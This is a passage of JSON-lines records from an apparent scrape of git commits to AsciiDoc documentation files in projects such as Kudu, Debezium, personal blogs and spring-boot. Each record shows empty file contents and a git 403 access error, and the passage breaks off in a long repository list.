doc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/catalog_plugin.adoc","new_file":"userguide\/tutorials\/catalog_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b1d1ad12d5f3471b427703f8a4f45b3a10d292e","subject":"Flesh out the introduction a bit more","message":"Flesh out the introduction a bit more\n\nChange-Id: I83091a4c8d457b03041df74014e6933f9338c478\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7099\nTested-by: jenkins\nReviewed-by: Todd Lipcon 
<2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/introduction.adoc","new_file":"docs\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acbd912d9f457922e18305b5bea0ba68817f1b3","subject":"Adding 'Debezium Evolving' post","message":"Adding 'Debezium Evolving' post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2022-10-26-debezium-evolving.adoc","new_file":"_posts\/2022-10-26-debezium-evolving.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b552b96eb63b1c052ed791b3aeb19790afa3f4c8","subject":"Update 19-02-2015-Python-para-Principiantes.adoc","message":"Update 19-02-2015-Python-para-Principiantes.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/19-02-2015-Python-para-Principiantes.adoc","new_file":"_posts\/19-02-2015-Python-para-Principiantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90cd4cf57d38b2b95cd00bf075633db730e0aff7","subject":"Update 2016-02-17-Thinking-in-Microservices.adoc","message":"Update 2016-02-17-Thinking-in-Microservices.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2016-02-17-Thinking-in-Microservices.adoc","new_file":"_posts\/2016-02-17-Thinking-in-Microservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0efd6666cb0b5dc707dfbbfb74e1c08c68c27ea3","subject":"Initializing openshift-docs repo","message":"Initializing openshift-docs repo\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d7e8d47764eea218d37e7392435e1d71fc7b56c","subject":"job: #11745 first draft of 
analysis","message":"job: #11745 first draft of analysis\n","repos":"keithbrown\/mc,rmulvey\/mc,xtuml\/mc,keithbrown\/mc,cortlandstarrett\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,cortlandstarrett\/mc,keithbrown\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,keithbrown\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_ant.adoc","new_file":"doc\/notes\/11745_loadmasl\/11745_loadmasl_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c70e5df829c2fbb4db6307627f8e096a6da8e08","subject":"release notes: add contributor counts","message":"release notes: add contributor counts\n\nChange-Id: Ib385b93671056c37474367266291370d7893550c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7848\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"99cc7fd0025630c0169e64f1487e30ca81c6632f","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b21ba96fca46f3e9b322b7913eacb38b6602e32","subject":"Update 2016-12-11-my-second-post.adoc","message":"Update 2016-12-11-my-second-post.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-12-11-my-second-post.adoc","new_file":"_posts\/2016-12-11-my-second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e375b3f900b0aa90ddacbbdfde40cbb8c16bfb36","subject":"Update glslc manual about -working-directory.","message":"Update glslc manual about -working-directory.\n","repos":"dneto0\/shaderc,dneto0\/shaderc,drewet\/shaderc,antiagainst\/shaderc,Qining\/shaderc,antiagainst\/shaderc,antiagainst\/shaderc,fuchsia-mirror\/third_party-shaderc,Qining\/shaderc,Qining\/shaderc,AWoloszyn\/shaderc,fuchsia-mirror\/third_party-shaderc,AWoloszyn\/shaderc,drewet\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,drewet\/shaderc,AWoloszyn\/shaderc,dneto0\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Qining\/shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f69f1efcfe414fc7c53046ffb93adcc10515f2d","subject":"Update 2015-05-07-WFP-Bookmarklet.adoc","message":"Update 2015-05-07-WFP-Bookmarklet.adoc","repos":"mtx69\/mtx69.github.io,mtx69\/mtx69.github.io,mtx69\/mtx69.github.io","old_file":"_posts\/2015-05-07-WFP-Bookmarklet.adoc","new_file":"_posts\/2015-05-07-WFP-Bookmarklet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mtx69\/mtx69.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ca4e7b41b74ed3ef1cdb7bc3a84d771accb5a4a","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc4519c1b782205a04b9ce4874e3f62f72da9675","subject":"Update 2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","message":"Update 2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","new_file":"_posts\/2015-11-21-Extraer-y-eliminar-secuencias-de-ficheros-FASTA-y-FASTQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35febb667b975fa7eeca63426fd368a2730c844d","subject":"y2b create post They Call Them SleepPhones...","message":"y2b create post They Call Them SleepPhones...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-20-They-Call-Them-SleepPhones.adoc","new_file":"_posts\/2016-06-20-They-Call-Them-SleepPhones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f0da9af80df439de55fe761699353873feeda828","subject":"Update 2017-03-14-First-Post.adoc","message":"Update 2017-03-14-First-Post.adoc","repos":"kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io,kzmenet\/kzmenet.github.io","old_file":"_posts\/2017-03-14-First-Post.adoc","new_file":"_posts\/2017-03-14-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kzmenet\/kzmenet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"424f8ca72d000ad8a1c44e66b6d4511486c2b10e","subject":"Rx examples README","message":"Rx examples README\n","repos":"vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples","old_file":"rx-examples\/README.adoc","new_file":"rx-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59cebbf7de7d9ee53c954c3b395c93f6ad18eba1","subject":"Update 2016-07-15-If-you-could-have-a-superpower.adoc","message":"Update 2016-07-15-If-you-could-have-a-superpower.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-07-15-If-you-could-have-a-superpower.adoc","new_file":"_posts\/2016-07-15-If-you-could-have-a-superpower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b43fc8c5238ece5e6e660c669c8be0bf2282a1be","subject":"Fixed image, added header.","message":"Fixed image, added header.\n","repos":"hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f4a46d6bf9f9e2bc461ce13de100f0827b32ab7","subject":"Docs: add Console assembly file (#2173)","message":"Docs: add Console assembly file (#2173)\n\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/assemblies\/assembly-using-console.adoc","new_file":"documentation\/assemblies\/assembly-using-console.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d679a66f36279da135a2921725dda4ab638f5a6","subject":"doc update","message":"doc 
update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75472c82b1c0a2a2a91472e405b3ee4639e26575","subject":"docs: update docs for CFile checksum handling","message":"docs: update docs for CFile checksum handling\n\nNotes that the behavior when encountering a CFile checksum has changed\nin 1.8.0. I've kept around the manual steps, since they are still\nvaluable.\n\nChange-Id: I11ecfe2739122f80894c5bbba13de853d962754a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11581\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01be5cff50afcd5e4dcd002bb2ab6955dd7688ce","subject":"add clojure sync event","message":"add clojure sync event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/clojure-sync.adoc","new_file":"content\/events\/2018\/clojure-sync.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bfa1f13012278545a7439fde4f35908cba1cc203","subject":"add decision to use Gradle","message":"add decision to use Gradle\n","repos":"pkleimann\/livingdoc,pkleimann\/livingdoc2,LivingDoc\/livingdoc,LivingDoc\/livingdoc,testIT-LivingDoc\/livingdoc2,pkleimann\/livingdoc,Drakojin\/livingdoc2,Drakojin\/livingdoc2,bitterblue\/livingdoc2,bitterblue\/livingdoc2,bitterblue\/livingdoc2,testIT-LivingDoc\/livingdoc2,pkleimann\/livingdoc2,Drakojin\/livingdoc2,pkleimann\/livingdoc,LivingDoc\/livingdoc","old_file":"doc\/decisions\/adr-003-use-gradle.adoc","new_file":"doc\/decisions\/adr-003-use-gradle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitterblue\/livingdoc2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dadb6d500031f6128e0a4827c4caaab1e1a5bfef","subject":"Add manpage for pegasus-service-ensemble","message":"Add manpage for pegasus-service-ensemble\n","repos":"pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus","old_file":"doc\/pegasus-service-ensemble.asciidoc","new_file":"doc\/pegasus-service-ensemble.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pegasus-isi\/pegasus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d39039cca915a288deaba1fc2145d583754df6b","subject":"Fixed annotation in Create a Fraction (SWARM-1655) (#738)","message":"Fixed annotation in Create a Fraction (SWARM-1655) (#738)\n\n","repos":"juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm","old_file":"docs\/howto\/create-a-fraction\/index.adoc","new_file":"docs\/howto\/create-a-fraction\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"409b89bd6ced6596b0ac29c9442a430178e3a1fc","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"769ffe28345348bbe6b3fb7f361dd4814d61e2ff","subject":"Missing space destroys formatting in doc","message":"Missing space destroys formatting in 
doc\n","repos":"neo4j-contrib\/spring-boot,rmoorman\/spring-boot,patrikbeno\/spring-boot,jcastaldoFoodEssentials\/spring-boot,buobao\/spring-boot,lburgazzoli\/spring-boot,trecloux\/spring-boot,ptahchiev\/spring-boot,ChunPIG\/spring-boot,srikalyan\/spring-boot,dreis2211\/spring-boot,jrrickard\/spring-boot,fireshort\/spring-boot,eonezhang\/spring-boot,scottfrederick\/spring-boot,DONIKAN\/spring-boot,ralenmandao\/spring-boot,rams2588\/spring-boot,jeremiahmarks\/spring-boot,ractive\/spring-boot,rizwan18\/spring-boot,philwebb\/spring-boot,Xaerxess\/spring-boot,yhj630520\/spring-boot,srikalyan\/spring-boot,bjornlindstrom\/spring-boot,ractive\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lcardito\/spring-boot,jack-luj\/spring-boot,nandakishorm\/spring-boot,166yuan\/spring-boot,joshiste\/spring-boot,candrews\/spring-boot,mosen11\/spring-boot,izestrea\/spring-boot,philwebb\/spring-boot,snicoll\/spring-boot,tsachev\/spring-boot,bsodzik\/spring-boot,vakninr\/spring-boot,eonezhang\/spring-boot,nghialunhaiha\/spring-boot,mebinjacob\/spring-boot,xingguang2013\/spring-boot,tbadie\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot-concourse,brettwooldridge\/spring-boot,existmaster\/spring-boot,tan9\/spring-boot,smayoorans\/spring-boot,nghiavo\/spring-boot,htynkn\/spring-boot,xiaoleiPENG\/my-project,10045125\/spring-boot,minmay\/spring-boot,felipeg48\/spring-boot,RainPlanter\/spring-boot,linead\/spring-boot,mosen11\/spring-boot,aahlenst\/spring-boot,nelswadycki\/spring-boot,panbiping\/spring-boot,mbogoevici\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,cbtpro\/spring-boot,ydsakyclguozi\/spring-boot,jayarampradhan\/spring-boot,sankin\/spring-boot,sbuettner\/spring-boot,gauravbrills\/spring-boot,mouadtk\/spring-boot,RobertNickens\/spring-boot,mbogoevici\/spring-boot,zorosteven\/spring-boot,wilkinsona\/spring-boot,thomasdarimont\/spring-boot,orangesdk\/spring-boot,zhangshuangquan\/spring-root,nevenc-pivotal\/spring-boot,paddymahoney\/spring-boot,simonnordberg\/spring-boot,joshthornhill\/spring-boot,peteyan\/spring-boot,wilkinsona\/spring-boot,hehuabing\/spring-boot,5zzang\/spring-boot,tan9\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jack-luj\/spring-boot,domix\/spring-boot,Pokbab\/spring-boot,xiaoleiPENG\/my-project,htynkn\/spring-boot,isopov\/spring-boot,trecloux\/spring-boot,duandf35\/spring-boot,jack-luj\/spring-boot,ApiSecRay\/spring-boot,nurkiewicz\/spring-boot,dnsw83\/spring-boot,prasenjit-net\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,raiamber1\/spring-boot,ameraljovic\/spring-boot,shangyi0102\/spring-boot,kdvolder\/spring-boot,mlc0202\/spring-boot,qq83387856\/spring-boot,Makhlab\/spring-boot,lokbun\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,dnsw83\/spring-boot,tbadie\/spring-boot,Pokbab\/spring-boot,ApiSecRay\/spring-boot,Makhlab\/spring-boot,MasterRoots\/spring-boot,auvik\/spring-boot,shakuzen\/spring-boot,fogone\/spring-boot,AstaTus\/spring-boot,chrylis\/spring-boot,nghialunhaiha\/spring-boot,izeye\/spring-boot,na-na\/spring-boot,allyjunio\/spring-boot,spring-projects\/spring-boot,mackeprm\/spring-boot,meloncocoo\/spring-boot,vandan16\/Vandan,yhj630520\/spring-boot,MrMitchellMoore\/spring-boot,designreuse\/spring-boot,JiweiWong\/spring-boot,rweisleder\/spring-boot,tan9\/spring-boot,sebastiankirsch\/spring-boot,marcellodesales\/spring-boot,meloncocoo\/spring-boot,lif123\/spring-boot,bclozel\/spring-boot,gorcz\/spring-boot,ptahchiev\/spring-boot,olivergierke\/spring-boot,allyjunio\/spring-boot,roymanish\/spring-boot,coolca
o\/spring-boot,playleud\/spring-boot,jforge\/spring-boot,ptahchiev\/spring-boot,joshthornhill\/spring-boot,lexandro\/spring-boot,lexandro\/spring-boot,vaseemahmed01\/spring-boot,raiamber1\/spring-boot,tbadie\/spring-boot,designreuse\/spring-boot,pvorb\/spring-boot,nurkiewicz\/spring-boot,crackien\/spring-boot,ojacquemart\/spring-boot,sebastiankirsch\/spring-boot,scottfrederick\/spring-boot,i007422\/jenkins2-course-spring-boot,npcode\/spring-boot,jjankar\/spring-boot,ApiSecRay\/spring-boot,master-slave\/spring-boot,prasenjit-net\/spring-boot,jvz\/spring-boot,mackeprm\/spring-boot,RichardCSantana\/spring-boot,soul2zimate\/spring-boot,cbtpro\/spring-boot,joansmith\/spring-boot,tbbost\/spring-boot,peteyan\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rickeysu\/spring-boot,artembilan\/spring-boot,imranansari\/spring-boot,cmsandiga\/spring-boot,akmaharshi\/jenkins,mbrukman\/spring-boot,mebinjacob\/spring-boot,Charkui\/spring-boot,dfa1\/spring-boot,eonezhang\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,dnsw83\/spring-boot,RobertNickens\/spring-boot,yhj630520\/spring-boot,cleverjava\/jenkins2-course-spring-boot,donhuvy\/spring-boot,jvz\/spring-boot,existmaster\/spring-boot,vakninr\/spring-boot,MasterRoots\/spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,soul2zimate\/spring-boot,ollie314\/spring-boot,joansmith\/spring-boot,eddumelendez\/spring-boot,mosoft521\/spring-boot,ameraljovic\/spring-boot,izestrea\/spring-boot,dreis2211\/spring-boot,ydsakyclguozi\/spring-boot,master-slave\/spring-boot,bijukunjummen\/spring-boot,lexandro\/spring-boot,meftaul\/spring-boot,lcardito\/spring-boot,yangdd1205\/spring-boot,mohican0607\/spring-boot,rickeysu\/spring-boot,bclozel\/spring-boot,roberthafner\/spring-boot,eddumelendez\/spring-boot,eonezhang\/spring-boot,liupd\/spring-boot,bijukunjummen\/spring-boot,master-slave\/spring-boot,jxblum\/spring-boot,shangyi0102\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,lenicliu\/spring-boot,cbtpro\/spring-boot,habuma\/spring-boot,marcellodesales\/spring-boot,clarklj001\/spring-boot,xc145214\/spring-boot,paddymahoney\/spring-boot,xdweleven\/spring-boot,ihoneymon\/spring-boot,zhanhb\/spring-boot,nareshmiriyala\/spring-boot,candrews\/spring-boot,mohican0607\/spring-boot,raiamber1\/spring-boot,jxblum\/spring-boot,okba1\/spring-boot,xialeizhou\/spring-boot,mebinjacob\/spring-boot,bclozel\/spring-boot,vaseemahmed01\/spring-boot,axelfontaine\/spring-boot,nisuhw\/spring-boot,cleverjava\/jenkins2-course-spring-boot,javyzheng\/spring-boot,joansmith\/spring-boot,artembilan\/spring-boot,axibase\/spring-boot,lif123\/spring-boot,aahlenst\/spring-boot,mbenson\/spring-boot,fjlopez\/spring-boot,spring-projects\/spring-boot,forestqqqq\/spring-boot,nebhale\/spring-boot,xwjxwj30abc\/spring-boot,domix\/spring-boot,javyzheng\/spring-boot,playleud\/spring-boot,paweldolecinski\/spring-boot,lexandro\/spring-boot,bjornlindstrom\/spring-boot,mouadtk\/spring-boot,nareshmiriyala\/spring-boot,nebhale\/spring-boot,snicoll\/spring-boot,tbbost\/spring-boot,nandakishorm\/spring-boot,liupugong\/spring-boot,michael-simons\/spring-boot,murilobr\/spring-boot,thomasdarimont\/spring-boot,Charkui\/spring-boot,mike-kukla\/spring-boot,nisuhw\/spring-boot,rizwan18\/spring-boot,paweldolecinski\/spring-boot,bbrouwer\/spring-boot,fjlopez\/spring-boot,shangyi0102\/spring-boot,roberthafner\/spring-boot,sungha\/spring-boot,clarklj001\/spring-boot,dnsw83\/spring-boot,
